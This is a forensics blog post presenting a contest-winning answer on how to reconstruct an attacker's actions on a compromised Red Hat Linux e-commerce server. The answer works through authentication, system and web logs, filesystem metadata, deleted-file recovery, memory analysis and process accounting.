Monday, January 27, 2014

Daily Blog #218: Sunday Funday 1/26/14 Winner!

Hello Reader,
   One of the great things about Sunday Funday's is that we get to find those individuals out there whose experience shines through in their answers. This weeks challenge had a few great answers,but this weeks winning answer was not only received before the other contenders but shown through as a winner. Take the time to read this one, you'll find some great ideas for your future Linux server investigations.

The Challenge:
You have a Redhat Enterprise Linux v5 sever running an eCommerce site.  The server was breached as the attacker logged in as the root user two weeks ago and linked the shell history file to /dev/null. What other artifacts can you rely on to determine what the attacker did over the past two weeks?

The Winning Answer:

TL;DR: /var/log/secure, SSH log, syslog, wtmp & btmp, Apache logs, firewall logs, acct files, memory image, file system metadata & journal & deleted content.

RHEL 5 first released 2007, uses kernel 2.6.18, even in the latest update (update 10, October 2013).

My strategy for approaching this investigation would consist of two phases: first, identify the periods of potential attacker activity; second, drill into these suspicious time ranges collect attacker commands and actions. Generally speaking, I would use multiple log sources to draft an initial list of suspicious time ranges. Then, I would use more specific tools to recover evidence of commands and actions within those ranges.

Due to the specific wording used in the scenario, I don’t have to worry about reviewing the system for evidence of a remote exploit such as SQL injection. Of course, the best place to start running that down is by reviewing application and server logs.

To begin, I would review the file /var/log/secure to identify how the attacker logged in for the first time. This is a log file that records entries associated with authentication requests, including timestamps, usernames, source processes, and error messages. According to the scenario, the system was compromised for the first time via the root login. So, I’d need to cross reference all legitimate administrator activity with root logins since approximately two weeks ago. The outstanding entries should be associated with the attacker (or, poorly configured services).

If I saw a single authentication attempt leading to a successful login, I would suspect that the attacker acquired legitimate credentials (account password or SSH certificate) elsewhere, perhaps by compromising another system, phishing the administrators, etc. I’d have to track this down by expanding the scope of the investigation. It is also possible that the password fell to a brute force attack, in which case I’d expect to see many, many unsuccessful attempts before a single successful authentication. The answer to this question may give me some insight into type of attack I was dealing with, and how I might expect to see the remainder of the system configured. For instance, a properly secured environment should not fall to a brute force attack targetting the entire internet.

I’d review and cross reference wtmp and btmp files for additional session information. wtmp tracks a history of logins and logouts by user, and btmp tracks failed authentication attempts. utmp could be helpful, but it typically tracks the current state of the system. All these files can be found in the /var/log directory. These are binary files, but the format is well known, and similar version of Linux (such as the Fedora release using kernel 2.6.18) can be used as effective analysis machines.

Once I had identified the first relevant login session, I would confirm the means of access: was it SSH, VNC, or some other remote access protocol. In each of these cases, I’d review the network architecture to determine from which network segments this protocol was allowed. Ideally, these administrative interfaces would not be exposed to the greater internet, but we’ve all see that too often. If the administrative ports were not accessible to the internet, then it again means that the scope of the investigation should be relaxed to include additional systems on the local network segment.

From the scenario description, the server is running an eCommerce site. An eCommerce site is typically composed of front end web services (serving static media like HTML, images, CSS, and Javascript, as well as dynamic pages generated by languages like PHP, Perl, or Python) and databases (MySQL or Postgres are popular). It is probably running at least some of the frontend services, and therefore that it is probably accessible to the internet.

This internet connection might be direct through a firewall, or through a load balancer/reverse proxy and firewall. I would review logs from the firewalls and load balancers to identify requests related activity from the same source IP address. This would help define additional periods of activity associated with the attacker.

I would timeline all application logs (usually, /var/log/*/*), syslog entries (/var/log/messages, etc.), and file system activity. Log2timeline or Plaso are good tools for organizing all this information. Some types of interesting application log entries could be yum package manager entries (/var/log/yum.log) indicating that the attacker installed additional software, or Apache web server entries (usually, /var/log/httpd/*) showing that the attacker test access to web directories via a web browser.

I would pay particular attention to the file system activity, reviewing file system metadata for newly created, modified, or deleted files. The Sleuthkit and loopback devices are my favorite tools for working with Linux images. I’d hope to find attacker tools and/or attacker archived data using the file system metadata. To recover further deleted files, I might try Foremost and extundelete. Foremost carves chunks from a binary stream using known file signatures. extundelete processes the journal on ext3/ext4 and attempts to recover old copies of inodes, and subsequently the file data.

Of course, I would also acquire a memory image of the server, and subsequently use Volatility to extract artifacts. I would first attempt to use the “linux_bash” plugin, which extracts Bash shell history entries from memory. These entries may still be in memory despite the /dev/null link. However, due to the duration of the compromise (two weeks), I would not consider this source authoritative of all activity. A number of the other plugins (for instance, linux_check_*) are also appropriate to use to identify the presence of rootkits and other suspicious processes.

Finally, I would review the process accounting information tracked by the “acct” service. This service typically stores its data within the directory /var/account/pacct that includes processes run and resources consumed. I would start by reviewing the data using “lastcomm” and “sar” programs to identify process names I don’t recognize. I could also correlate processes run before two weeks ago with those run after. Though the process accounting logs do not always contain verbose information, they could be effective in identifying Bitcoin miners or other rogue processes.